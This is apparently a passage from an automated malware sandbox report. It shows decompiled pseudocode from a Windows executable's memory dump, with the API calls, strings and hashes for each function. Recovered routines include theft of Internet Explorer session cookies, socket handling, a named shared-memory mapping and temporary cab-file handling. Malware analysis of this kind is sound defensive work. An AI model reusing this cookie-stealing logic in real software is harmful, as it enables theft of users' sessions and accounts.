    									 *((char*)(_t269 + 6)) = 0;
    								}
    								__eflags =  *(_t269 + 4);
    								if( *(_t269 + 4) == 0) {
    									 *(_t269 + 4) = 1;
    								}
    								_t149 =  *((intOrPtr*)(_t269 + 6));
    								_v5 = _t149;
    								__eflags = _t149;
    								if(_t149 == 0) {
    									_v5 = 6;
    								}
    								_t256 =  *(_t255 + 0x428);
    								_t219 =  *((intOrPtr*)(_a8 + 0x42c)) + _t256;
    								_v20 = _v20 & 0x00000000;
    								_t244 = _t256;
    								while(1) {
    									__eflags = _t256 - _t219;
    									if(_t256 >= _t219) {
    										break;
    									}
    									__eflags =  *_t256 - 0x3d;
    									if( *_t256 != 0x3d) {
    										L40:
    										_t256 = _t256 + 1;
    										__eflags = _t256;
    										continue;
    									}
    									_t151 =  *(_t269 + 0xe) & 0x0000ffff;
    									_a7 = 0;
    									__eflags = _t151;
    									if(_t151 != 0) {
    										_t208 = E0040AD1B((_t151 & 0x0000ffff) + _t269, E0040F521((_t151 & 0x0000ffff) + _t269), _t244, _t256 - _t244, 0, 0, 0);
    										__eflags = _t208;
    										if(_t208 == 0) {
    											_a7 = 1;
    										}
    									}
    									_t152 =  *((intOrPtr*)(_t269 + 5));
    									__eflags = _t152;
    									if(_t152 != 0) {
    										_v20 = _v20 + 1;
    										__eflags = (_t152 & 0x000000ff) - _v20;
    										if((_t152 & 0x000000ff) != _v20) {
    											_t44 =  &_a7;
    											 *_t44 = _a7 + 1;
    											__eflags =  *_t44;
    										}
    									}
    									_t153 = _t256;
    									_v28 = _t256;
    									while(1) {
    										__eflags = _t153 - _t219;
    										if(_t153 >= _t219) {
    											break;
    										}
    										_t153 = _t153 + 1;
    										__eflags =  *_t153 - 0x26;
    										_v28 = _t153;
    										if( *_t153 != 0x26) {
    											continue;
    										}
    										break;
    									}
    									__eflags = _a7;
    									if(_a7 != 0) {
    										L39:
    										_t244 = _v28 + 1;
    										__eflags = _v28 + 1;
    										goto L40;
    									}
    									_t246 = _v5 & 0x000000ff;
    									__eflags = _t153 - _t256 - 1 - _t246;
    									if(_t153 - _t256 - 1 != _t246) {
    										goto L39;
    									}
    									_t223 = 0;
    									__eflags = _t246;
    									if(_t246 <= 0) {
    										L38:
    										_t157 = E004100F6( &_v68, _v12, _v24);
    										__eflags = _t157;
    										if(_t157 != 0) {
    											_t220 = _v5 & 0x000000ff;
    											_v36 = _t256 + 1;
    											_t159 = E0040F0FC( &_v52, _t256 + 1, _t220);
    											 *((char*)(_t275 + _t220 - 0x30)) = 0;
    											_v28 = E0040F2EB(_t159, _t223);
    											_v20 = 0;
    											_t163 = E00408471( &_v20, _t223, 0,  &_v68);
    											_v12 = _t163;
    											_v24 = 0;
    											__eflags = _t163 & 0x00000003;
    											if((_t163 & 0x00000003) != 0) {
    												_v12 = 0;
    											}
    											_t224 = _v20;
    											_t164 = 4;
    											__eflags = _v12 - _t164;
    											if(_v12 < _t164) {
    												_v12 = _t164;
    											} else {
    												_v24 =  *_t224;
    											}
    											asm("sbb dl, dl");
    											_v12 = _v12 >> 2;
    											_t250 =  ~(_v24 % ( *(_t269 + 4) & 0x000000ff)) + 1;
    											_t261 = 1;
    											_a7 = _t250;
    											__eflags = _v12 - 1;
    											if(_v12 <= 1) {
    												L53:
    												__eflags = _t250;
    												if(__eflags <= 0) {
    													L62:
    													_t167 =  *0x416c34; // 0x25df5a8
    													_v6 = 1;
    													__eflags = _t250 - 1;
    													if(_t250 != 1) {
    														_t108 = _t167 + 0x180; // 0x2563499
    														_t168 =  *_t108;
    													} else {
    														_t106 = _t167 + 0x17c; // 0x2563519
    														_t168 =  *_t106;
    													}
    													_a8 = _t168;
    													_t169 = E0040F521(_t168);
    													_t262 = _a16;
    													_t271 = _a12;
    													_v16 = _t169;
    													_t171 = E0040F053( *_t262 + _t220 + _t169 + 0x14, _t271);
    													__eflags = _t171;
    													if(_t171 != 0) {
    														wnsprintfA( &_v52, 0xf, "%%0%uu", _t220);
    														wnsprintfA( &_v84, 0xf,  &_v52, _v28);
    														 *_t262 =  *_t262 + E0040F0FC( *_t271 +  *_t262, _a8, _v16);
    														E0040F0FC( *_t271 +  *_t262,  &_v84, _t220);
    														_t191 =  *_t262 + _t220;
    														 *((char*)(_t191 +  *_t271)) = 0xa;
    														_t192 = _t191 + 1;
    														__eflags = _t192;
    														 *_t262 = _t192;
    													}
    													L68:
    													_t263 = _v12;
    													_t124 = _t263 + 4; // 0x6
    													_t173 = E0040F053(_t124,  &_v20);
    													_t273 = _v20;
    													__eflags = _t173;
    													if(_t173 != 0) {
    														__eflags = _a7 - 2;
    														if(_a7 != 2) {
    															_t180 = _v24 + 1;
    															__eflags = _t180;
    															 *_t273 = _t180;
    														}
    														_t176 = _t263 << 2;
    														 *((intOrPtr*)(_t176 + _t273)) = _v28;
    														__eflags = _t176 + 4;
    														E004084E1(_t176 + 4, _t176 + 4, 0,  &_v68, _t273);
    													}
    													E0040F0C0(_t273);
    													goto L73;
    												}
    												_t264 = E0040F113(__eflags,  *((intOrPtr*)(_a8 + 0x428)),  *((intOrPtr*)(_a8 + 0x42c)));
    												_v16 = _t264;
    												__eflags = _t264;
    												if(_t264 == 0) {
    													goto L68;
    												}
    												_t251 = _a8;
    												_t266 = _t264 -  *((intOrPtr*)(_a8 + 0x428)) + _v36;
    												__eflags =  *(_t269 + 2) & 0x00000001;
    												if(__eflags == 0) {
    													E0040F173(_t194, _t266, 0x31, _t220);
    													L60:
    													_t196 = E0040CDBB(_t251, __eflags, _v16,  *((intOrPtr*)(_t251 + 0x42c)));
    													__eflags = _t196;
    													if(_t196 == 0) {
    														E0040F0C0(_v16);
    														goto L68;
    													}
    													_t250 = _a7;
    													goto L62;
    												}
    												_t274 = _t220 + _t266;
    												__eflags = _t266 - _t274;
    												if(__eflags >= 0) {
    													goto L60;
    												} else {
    													goto L57;
    												}
    												do {
    													L57:
    													_push(0x30);
    													_t198 = 0x39;
    													 *_t266 = E004101D4(_t198);
    													_t266 = _t266 + 1;
    													__eflags = _t266 - _t274;
    												} while (__eflags < 0);
    												_t251 = _a8;
    												goto L60;
    											} else {
    												while(1) {
    													__eflags =  *((intOrPtr*)(_t224 + _t261 * 4)) - _v28;
    													if( *((intOrPtr*)(_t224 + _t261 * 4)) == _v28) {
    														break;
    													}
    													_t261 = _t261 + 1;
    													__eflags = _t261 - _v12;
    													if(_t261 < _v12) {
    														continue;
    													}
    													goto L53;
    												}
    												_a7 = 2;
    												_t250 = _a7;
    												goto L53;
    											}
    										}
    										goto L39;
    									} else {
    										goto L35;
    									}
    									while(1) {
    										L35:
    										_t202 =  *((intOrPtr*)(_t223 + _t256 + 1));
    										__eflags = _t202 - 0x30;
    										if(_t202 < 0x30) {
    											goto L39;
    										}
    										__eflags = _t202 - 0x39;
    										if(_t202 > 0x39) {
    											goto L39;
    										}
    										_t223 = _t223 + 1;
    										__eflags = _t223 - _t246;
    										if(_t223 < _t246) {
    											continue;
    										}
    										goto L38;
    									}
    									goto L39;
    								}
    								goto L73;
    							}
    							_t239 = (_t148 & 0x0000ffff) + _t269;
    							__eflags =  *_t239 - 0x2a;
    							if( *_t239 != 0x2a) {
    								L12:
    								_t210 = E0040AD1B(_t239, E0040F521(_t239),  *(_t255 + 0x428),  *((intOrPtr*)(_t255 + 0x42c)), 0, 0, 0);
    								__eflags = _t210;
    								if(_t210 == 0) {
    									goto L15;
    								}
    								goto L13;
    							}
    							__eflags =  *(_t239 + 1);
    							if( *(_t239 + 1) == 0) {
    								goto L15;
    							}
    							goto L12;
    						}
    						_t212 = E0040AD1B((_t147 & 0x0000ffff) + _t269, E0040F521((_t147 & 0x0000ffff) + _t269),  *(_t255 + 0x428),  *((intOrPtr*)(_t255 + 0x42c)), 0, 0, 0);
    						__eflags = _t212;
    						if(_t212 == 0) {
    							goto L13;
    						}
    						goto L9;
    					}
    					goto L73;
    				}
    			}

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID:
    • String ID: %%0%uu
    • API String ID: 0-1393091064
    • Opcode ID: defbdd3203f67d4eb0326f87d6c5dc908f28739c948639714bac8d8ebea94302
    • Instruction ID: 31f280b8ed727dcf68fb026ad35811176fe2080427b69b256e17b6a6b9ee605f
    • Opcode Fuzzy Hash: defbdd3203f67d4eb0326f87d6c5dc908f28739c948639714bac8d8ebea94302
    • Instruction Fuzzy Hash: FDD1C470900249AFDF10DFA4C881BBEBBB6AF45308F14807BE595B7282D739994AC759
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 71%
    			E004112FD(char _a4) {
    				char _v9;
    				char _v13;
    				char _v20;
    				unsigned int _v25;
    				short _v27;
    				signed char _v28;
    				unsigned int _v40;
    				short _v42;
    				char _v44;
    				char _v304;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t57;
    				short _t72;
    				void* _t74;
    				void* _t77;
    				void* _t78;
    				void* _t88;
    				char _t90;
    				char _t97;
    				char _t106;
    				char _t124;
    				char _t127;
    				void* _t130;
    				intOrPtr _t131;
    				void* _t132;
    
    				_t106 = 0;
    				_push(0);
    				_push( &_v28);
    				_push(_a4);
    				_t57 = 7;
    				if(E0041053D(_t57) != 0) {
    					while(E0041053D(1, _a4,  &_v9, _t106) != 0) {
    						if(_v9 == _t106) {
    							_t109 = _v25;
    							_v13 = 0x5a;
    							if(((_v25 & 0x00ff0000 | _v25 >> 0x00000010) >> 0x00000008 | (_t109 & 0x0000ff00 | _t109 << 0x00000010) << 0x00000008) - 1 > 0xfe) {
    								L21:
    								_v9 = 1;
    								if(_v13 != 0x5a) {
    									L46:
    									return E00411287(_a4, 0xffffffff, _v13, _t106) & 0xffffff00 | _t68 != 0x00000000;
    								}
    								E0040F173( &_v44,  &_v44, _t106, 0x10);
    								_t72 = 2;
    								_v44 = _t72;
    								_t74 = (_v28 & 0x000000ff) - 1;
    								if(_t74 == 0) {
    									_v42 = _v27;
    									_v40 = _v25;
    									_t77 = E004105BC( &_v44, 0x10);
    									_t126 = _t77;
    									if(_t77 == 0xffffffff) {
    										L24:
    										_v13 = 0x5b;
    										goto L46;
    									}
    									_t78 = E00411287(_a4, _t126, 0x5a, _t106);
    									if(_t78 != 1) {
    										if(_t78 != 0xffffffff) {
    											_v9 = _t106;
    										} else {
    											_v13 = 0x5b;
    										}
    									} else {
    										E00410693(_t126, _a4);
    										_t106 = 0;
    									}
    									E004108F5(_t126);
    									if(_v9 != 1 || _v13 == 0x5a) {
    										L36:
    										return _v9;
    									} else {
    										goto L46;
    									}
    								}
    								if(_t74 == 1) {
    									_t127 = E004105F2( &_v44, 0x10, 1);
    									_v20 = _t127;
    									if(_t127 == 0xffffffff) {
    										goto L24;
    									}
    									_t124 = E00411287(_a4, _t127, 0x5a, _t106);
    									if(_t124 != 1) {
    										E004108F5(_t127);
    										L33:
    										if(_t124 == 0xffffffff) {
    											goto L24;
    										}
    										if(_t124 != 1) {
    											_v9 = 0;
    										}
    										goto L36;
    									}
    									_t88 = E004108D1( &_v20, _t106,  &_a4);
    									_t108 = _t88;
    									E004108F5(_v20);
    									if(_t88 != 0xffffffff) {
    										_t125 = _a4;
    										_t90 = E00411287(_a4, _t108, 0x5a, 2);
    										_v20 = _t90;
    										if(_t90 == 1) {
    											E00410693(_t108, _t125);
    										}
    										E004108F5(_t108);
    										_t124 = _v20;
    										_t106 = 0;
    										goto L33;
    									}
    									_v13 = 0x5b;
    									_t106 = 0;
    									goto L46;
    								}
    								goto L24;
    							}
    							_t130 = 0;
    							while(E0041053D(1, _a4,  &_v9, _t106) != 0) {
    								_t97 = _v9;
    								 *((char*)(_t132 + _t130 - 0x12c)) = _t97;
    								if(_t97 == 0) {
    									_push( &_v20);
    									_push(_t106);
    									_push(_t106);
    									_push( &_v304);
    									_v20 = _t106;
    									if( *0x416dc0() == 0) {
    										_t131 = _v20;
    										while(_t131 != _t106) {
    											if( *((intOrPtr*)(_t131 + 4)) == 2) {
    												E0040F0FC( &_v25,  *((intOrPtr*)(_t131 + 0x18)) + 4, 4);
    												L20:
    												 *0x416dc4(_v20);
    												if(_t131 == _t106) {
    													goto L13;
    												}
    												goto L21;
    											}
    											_t131 =  *((intOrPtr*)(_t131 + 0x1c));
    										}
    										goto L20;
    									}
    									L13:
    									_v13 = 0x5b;
    									goto L21;
    								}
    								_t130 = _t130 + 1;
    								if(_t130 <= 0xff) {
    									continue;
    								}
    								goto L1;
    							}
    							goto L1;
    						}
    					}
    				}
    				L1:
    				return 0;
    			}

    APIs
    • getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 004113BC
    • FreeAddrInfoW.WS2_32(?), ref: 004113F5
      • Part of subcall function 00411287: getpeername.WS2_32(000000FF,00000000,00000000), ref: 004112AB
      • Part of subcall function 00410693: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00410724
      • Part of subcall function 004108F5: shutdown.WS2_32(?,00000002), ref: 004108FD
      • Part of subcall function 004108F5: closesocket.WS2_32(?), ref: 00410904
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddrFreeInfoclosesocketgetaddrinfogetpeernameselectshutdown
    • String ID: Z
    • API String ID: 263972530-1505515367
    • Opcode ID: d795915d446970e929d6f6a92ade37f0c13d061d5bd64dcc41b6941ba5b22e6e
    • Instruction ID: 1677c04abba9b64f259eae476e470dcc2519a0623ef7b656ea11488e82cf1bee
    • Opcode Fuzzy Hash: d795915d446970e929d6f6a92ade37f0c13d061d5bd64dcc41b6941ba5b22e6e
    • Instruction Fuzzy Hash: 90614D31900158BADF10ABA4CC41BFF7B6A9F05354F044567EB11B76E1D2BC89C587AA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00407BB7(short _a4, signed int _a8, char* _a16, int _a20) {
    				char _v5;
    				WCHAR* _v12;
    				intOrPtr _v40;
    				intOrPtr _v48;
    				char _v56;
    				short _v576;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t39;
    				signed char _t41;
    				char _t43;
    				WCHAR* _t47;
    				WCHAR _t48;
    				void* _t50;
    				short* _t51;
    				long _t53;
    				signed int _t66;
    				short _t72;
    				short _t73;
    				int _t75;
    				WCHAR* _t77;
    
    				_v5 = 0;
    				if(_a4 == 0x45 || _a4 == 0x46) {
    					E0040B9D4( &_v576);
    					_t66 = E0040F533( &_v576) + 1;
    					E00414B4B( &_v56);
    					_v40 =  *_a8;
    					_t39 =  *0x416a8c; // 0x0
    					_v48 = _t39;
    					_v12 =  &_v576;
    					_t41 = E0040FC6E(_t66,  &_v56, __eflags, 0);
    					asm("sbb al, al");
    					_t43 =  ~_t41 + 1;
    					__eflags = _t43;
    					_v5 = _t43;
    				} else {
    					_t66 = ExpandEnvironmentStringsW(E0040F4DC(_a8 | 0xffffffff,  *_a8),  &_v576, 0x104);
    					E0040F0C0(_t61);
    					_t43 = _v5;
    				}
    				if(_t66 != 0 && _t43 == 0) {
    					_t75 = _a20;
    					_t47 = E0040F0A8(_t66 + _t75 + _t66 + _t75 + 0x14);
    					_t77 = _t47;
    					_t48 = 0x22;
    					 *_t77 = _t48;
    					_t22 = _t77 + 2; // 0x2
    					_t50 = E0040F0FC(_t22,  &_v576, _t66 + _t66);
    					_t51 = _t50 + _t77;
    					_t72 = 0x22;
    					 *_t51 = _t72;
    					if(_t75 != 0) {
    						_t73 = 0x20;
    						 *((short*)(_t51 + 2)) = _t73;
    						_t25 = _t66 * 2; // 0x4
    						MultiByteToWideChar(0, 0, _a16, _t75, _t77 + _t25 + 4, _t75);
    					}
    					if(_a4 == 0x45 || _a4 == 0x47) {
    						_t53 = 1;
    						__eflags = 1;
    					} else {
    						_t53 = 0;
    					}
    					E0040BDF2(0, _t53, 0, _t77);
    					E0040F0C0(_t77);
    					_t43 = _v5;
    				}
    				return 0 | _t43 == 0x00000000;
    			}

    APIs
    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000004,?,00000002,?,00000022,00000000,?), ref: 00407CA5
      • Part of subcall function 0040F4DC: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,?,00000000,0040B681,00000001), ref: 0040F50D
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104,?), ref: 00407BF1
      • Part of subcall function 0040F0C0: HeapFree.KERNEL32(00000000,00000000,0040B690,00000000,00000001), ref: 0040F0D3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: ByteCharMultiWide$EnvironmentExpandFreeHeapStrings
    • String ID: G
    • API String ID: 2894312133-985283518
    • Opcode ID: 4388bce87f8b688e0c3f4eac196e126fc89fc075d19b531e8a1cc133a8761235
    • Instruction ID: fa6558d167a557baf384a7769db89d97370ff1dcafa1ecb54013ea2ef1ba8cfa
    • Opcode Fuzzy Hash: 4388bce87f8b688e0c3f4eac196e126fc89fc075d19b531e8a1cc133a8761235
    • Instruction Fuzzy Hash: 6D319731908208AADB25EFA4C885BDA77B8DF05304F10C47BF505B72D2E779DA49C7A9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 30%
    			E004091AE(void* __ecx, void* __edx) {
    				char _v8;
    				void* _t5;
    				void* _t6;
    				signed short _t8;
    				signed short _t9;
    				signed int _t12;
    				signed char _t15;
    				signed int _t17;
    				signed int _t20;
    				void* _t22;
    				void* _t26;
    				void* _t31;
    				signed int _t32;
    				signed int _t34;
    
    				_t26 = __edx;
    				_t34 =  *0x416a54; // 0x0
    				if(_t34 != 0) {
    					L17:
    					_t5 = 1;
    				} else {
    					_t6 =  *0x416a4c; // 0x0
    					if(_t6 != 0) {
    						L4:
    						__eflags =  *0x416a50; // 0x0
    						if(__eflags != 0) {
    							L6:
    							__eflags =  *0x416a54; // 0x0
    							if(__eflags != 0) {
    								goto L17;
    							} else {
    								_t32 =  *0x416ac4(0, _t31);
    								__eflags = _t32;
    								if(_t32 != 0) {
    									_t8 =  *0x416e10(_t32, 8);
    									 *0x416a5c = _t8;
    									_t9 =  *0x416e10(_t32, 0xa);
    									 *0x416a5e = _t9;
    									__eflags =  *0x416dfc(_t32,  *0x416a5c & 0x0000ffff, _t9 & 0x0000ffff);
    									if(__eflags == 0) {
    										_t12 = 0;
    										__eflags = 0;
    									} else {
    										_t12 = E004122EE(_t26, __eflags, _t32,  &_v8, 0x416a58, 0, _t11);
    									}
    									 *0x416a54 = _t12;
    									__eflags = _t12;
    									if(_t12 != 0) {
    										_t25 = _v8;
    										_t15 =  *(_v8 + 0xe) >> 3;
    										 *0x416a64 = _t15;
    										_t17 = (_t15 & 0x000000ff) * ( *0x416a5c & 0x0000ffff);
    										 *0x416a60 = _t17;
    										__eflags = _t17 & 0x00000003;
    										if((_t17 & 0x00000003) != 0) {
    											_t20 = (_t17 & 0xfffffffc) + 4;
    											__eflags = _t20;
    											 *0x416a60 = _t20;
    										}
    										E0040F0C0(_t25);
    									}
    									 *0x416acc(0, _t32);
    								}
    								__eflags =  *0x416a54; // 0x0
    								if(__eflags == 0) {
    									goto L3;
    								} else {
    									goto L17;
    								}
    							}
    						} else {
    							_t22 = MapViewOfFile(_t6, 2, 0, 0, 0);
    							 *0x416a50 = _t22;
    							__eflags = _t22;
    							if(_t22 == 0) {
    								goto L3;
    							} else {
    								goto L6;
    							}
    						}
    					} else {
    						_t6 = OpenFileMappingW(2, 0, L"QggrrtyW");
    						 *0x416a4c = _t6;
    						if(_t6 != 0) {
    							goto L4;
    						} else {
    							L3:
    							_t5 = 0;
    						}
    					}
    				}
    				return _t5;
    			}

    APIs
    • OpenFileMappingW.KERNEL32(00000002,00000000,QggrrtyW), ref: 004091D2
    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 004091F6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$MappingOpenView
    • String ID: QggrrtyW
    • API String ID: 3439327939-3177217124
    • Opcode ID: 77e8ed7ddb4b49a65edf76b6c23dab62b0b1766b8ea498e893e1d5797670598e
    • Instruction ID: 39e17e35c4c1dc8bdcd45bf5b3e29a08e91e5b7f27767e8e919f423633711d0a
    • Opcode Fuzzy Hash: 77e8ed7ddb4b49a65edf76b6c23dab62b0b1766b8ea498e893e1d5797670598e
    • Instruction Fuzzy Hash: 1021B175601650BAC3219B259C089F73BA9EF82781715C57FF802F2AA1E779CD41C72C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E004049FA(void* __ebx) {
    				char _v8;
    				intOrPtr _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				void* __esi;
    				signed int _t18;
    				intOrPtr _t27;
    				void* _t29;
    				void* _t34;
    				intOrPtr _t35;
    				intOrPtr _t36;
    				void* _t37;
    				void* _t39;
    				signed int _t40;
    				void* _t42;
    				void* _t47;
    
    				_t40 = 0;
    				_t37 = 0;
    				_v8 = 0;
    				 *0x416fe8(0x416758);
    				_t18 = 0;
    				_v16 = 0;
    				_t42 =  *0x416770 - _t37; // 0x0
    				if(_t42 <= 0) {
    					L9:
    					 *0x416fec(0x416758);
    					E004084E1(_t37, _t47, 0, "PopOpO03-3331111", _t40);
    					return E0040F0C0(_t40);
    				}
    				do {
    					_t35 =  *0x416774; // 0x0
    					_t23 = _t35 + _t18 * 4;
    					if( *(_t35 + _t18 * 4) != 0) {
    						_t36 = E0040F47D(_t23 | 0xffffffff,  *_t23);
    						_v12 = _t36;
    						if(_t36 != 0) {
    							_t27 = E0040F521(_t36);
    							_t34 = _t27 + _t37;
    							_v20 = _t27;
    							_t29 = E0040F053(_t34 + 1,  &_v8);
    							_t40 = _v8;
    							if(_t29 != 0) {
    								E0040F0FC(_t37 + _t40, _v12, _v20);
    								_t39 = _t34;
    								 *((char*)(_t39 + _t40)) = 0x20;
    								_t37 = _t39 + 1;
    							}
    							E0040F0C0(_v12);
    						}
    					}
    					_t18 = _v16 + 1;
    					_v16 = _t18;
    					_t47 = _t18 -  *0x416770; // 0x0
    				} while (_t47 < 0);
    				goto L9;
    			}

    APIs
    • RtlEnterCriticalSection.NTDLL(00416758), ref: 00404A0E
    • RtlLeaveCriticalSection.NTDLL(00416758), ref: 00404A92
      • Part of subcall function 0040F47D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404A3A,00000000), ref: 0040F4AD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$ByteCharEnterLeaveMultiWide
    • String ID: PopOpO03-3331111
    • API String ID: 3162664464-962168976
    • Opcode ID: 45377b6a5244ab6be35729156f860c6436f7ca14a4aa856f69dfd640224adb3a
    • Instruction ID: e21f73645756eadc82fd8c0ba6e590488bb70e0e8e9f28dd55a31350d4ca5084
    • Opcode Fuzzy Hash: 45377b6a5244ab6be35729156f860c6436f7ca14a4aa856f69dfd640224adb3a
    • Instruction Fuzzy Hash: BC11A271A00114AFCB21AF69CC45ADE7BB5FF81318F11407AE124B71D2D7399A45CB58
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004154D1(void* __ecx, void* __edx, intOrPtr _a4) {
    				short _v528;
    				short _v1048;
    				void* _t20;
    				int _t25;
    				void* _t26;
    				void* _t27;
    
    				_t27 = __edx;
    				_t26 = __ecx;
    				_t25 = 0;
    				if(GetTempPathW(0xf6,  &_v1048) - 1 <= 0xf5 && GetTempFileNameW( &_v1048, L"bc", 0,  &_v528) > 0 && E0040FFBF( &_v528) != 0) {
    					_t20 = E00411E20( &_v528, _a4);
    					_t31 = _t20;
    					if(_t20 != 0) {
    						_t25 = E0041547E(_t26, _t27, _t31,  &_v528, _a4, L"mfplayer_cfg.cab");
    						E0040FFBF( &_v528);
    					}
    				}
    				return _t25;
    			}


    APIs
    • GetTempPathW.KERNEL32(000000F6,?,00000000), ref: 004154E9
    • GetTempFileNameW.KERNEL32(?,004042A0,00000000,?), ref: 0041550B
      • Part of subcall function 0040FFBF: SetFileAttributesW.KERNELBASE(?,00000020,00412063,?,?,?,00000000), ref: 0040FFC5
      • Part of subcall function 0040FFBF: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040FFCF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Temp$AttributesDeleteNamePath
    • String ID: mfplayer_cfg.cab
    • API String ID: 838033943-194030306
    • Opcode ID: 06502361bc92a5ea710a921492a91b02c3db3927516ef95a57ea7664feb2971b
    • Instruction ID: 6018a4fa7fcc0aa58145f6f666780cb80e5a267f2a02493b64736013f5823f4d
    • Opcode Fuzzy Hash: 06502361bc92a5ea710a921492a91b02c3db3927516ef95a57ea7664feb2971b
    • Instruction Fuzzy Hash: C601A7B294031DBACF20EBA4CC49EDA776D9B00345F0044B37B15E3182D278DAC98B28
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040C616(void* __ecx, void* __edx, char* _a4) {
    				long _v8;
    				int _t14;
    				char* _t21;
    
    				_push(__ecx);
    				if(InternetGetCookieA(_a4, 0, 0,  &_v8) != 0) {
    					_t21 = E0040F0A8(_v8);
    					if(_t21 != 0) {
    						_t14 = InternetGetCookieA(_a4, 0, _t21,  &_v8);
    						_t29 = _t14;
    						if(_t14 != 0) {
    							_push(_t21);
    							E0041540F(__ecx, __edx, _t29, 1, 0, 0, L"%S\r\nIE session cookies:\r\n%S", _a4);
    						}
    						E0040F0C0(_t21);
    					}
    				}
    				E004055B9(0);
    				return E004051FC();
    			}


    APIs
    • InternetGetCookieA.WININET(00000000,00000000,00000000,?), ref: 0040C627
    • InternetGetCookieA.WININET(00000000,00000000,00000000,?), ref: 0040C648
    Strings
    • %SIE session cookies:%S, xrefs: 0040C656
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CookieInternet
    • String ID: %SIE session cookies:%S
    • API String ID: 930238652-348586552
    • Opcode ID: 5024ee257deaa8f7fa95423b45995ecad4d20e7b95a3ac448a8b635e975e8596
    • Instruction ID: 704ffb105910bf7bb8b5c78f2e2f725009f149a470ee5c2f22fd4ab64d611c3c
    • Opcode Fuzzy Hash: 5024ee257deaa8f7fa95423b45995ecad4d20e7b95a3ac448a8b635e975e8596
    • Instruction Fuzzy Hash: A5F06272201024B6C730AB67CC49DDF3E6CDF82B94B00403AB508B5092DA39DA44D6F8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041195F(intOrPtr _a4, intOrPtr _a12) {
    				short _v524;
    				void* __edi;
    				int _t23;
    				intOrPtr _t24;
    
    				_t23 = 0;
    				if(GetTempFileNameW(_a12 + 0x746, L"cab", 0,  &_v524) > 0 && E0040FFBF( &_v524) != 0) {
    					_t24 = _a4;
    					E0040F45E(PathFindFileNameW( &_v524), _t24 + 3);
    					E0040F0FC(_t24, "?T", 2);
    					 *((char*)(_t24 + 2)) = 0x5c;
    					_t23 = 1;
    				}
    				return _t23;
    			}


    APIs
    • GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00411981
      • Part of subcall function 0040FFBF: SetFileAttributesW.KERNELBASE(?,00000020,00412063,?,?,?,00000000), ref: 0040FFC5
      • Part of subcall function 0040FFBF: DeleteFileW.KERNELBASE(00000000,?,?,00000000), ref: 0040FFCF
    • PathFindFileNameW.SHLWAPI(?,?,?), ref: 004119A9
      • Part of subcall function 0040F45E: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,?,004119B6,?,?), ref: 0040F471
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$Name$AttributesByteCharDeleteFindMultiPathTempWide
    • String ID: cab
    • API String ID: 2491076439-1787492089
    • Opcode ID: 4b5e9faa64f98ba76e1f433cdf00d2b80cdc1486807a14bc8174442f0bbf3b2d
    • Instruction ID: 796f807081d87769f8cbe58b1e7ce3ea3eb509c13a4b8929cf0f9b7430ab8027
    • Opcode Fuzzy Hash: 4b5e9faa64f98ba76e1f433cdf00d2b80cdc1486807a14bc8174442f0bbf3b2d
    • Instruction Fuzzy Hash: 52F028B2A0032467CB30ABA5DC0AFCB77BC8F45740F0145767A56F35D1D638EA488A94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 90%
    			E0040A659(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, char _a8) {
    				intOrPtr _t4;
    				int _t5;
    				intOrPtr _t8;
    				intOrPtr _t10;
    
    				_t10 = __edx;
    				_t8 = __ecx;
    				_t4 = 0x402325;
    				if(__edx == 0) {
    					_t10 = 0x402325;
    				}
    				if(_t8 == 0) {
    					_t8 = _t4;
    				}
    				if(_a4 != 0) {
    					_t4 = _a4;
    				}
    				_t3 =  &_a8; // 0x402325
    				_t5 = wnsprintfA( *_t3, 0x103, "%s|%s|%s", _t4, _t8, _t10);
    				asm("sbb al, al");
    				return _t5 + 0xfffffffffffffffc;
    			}


    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: wnsprintf
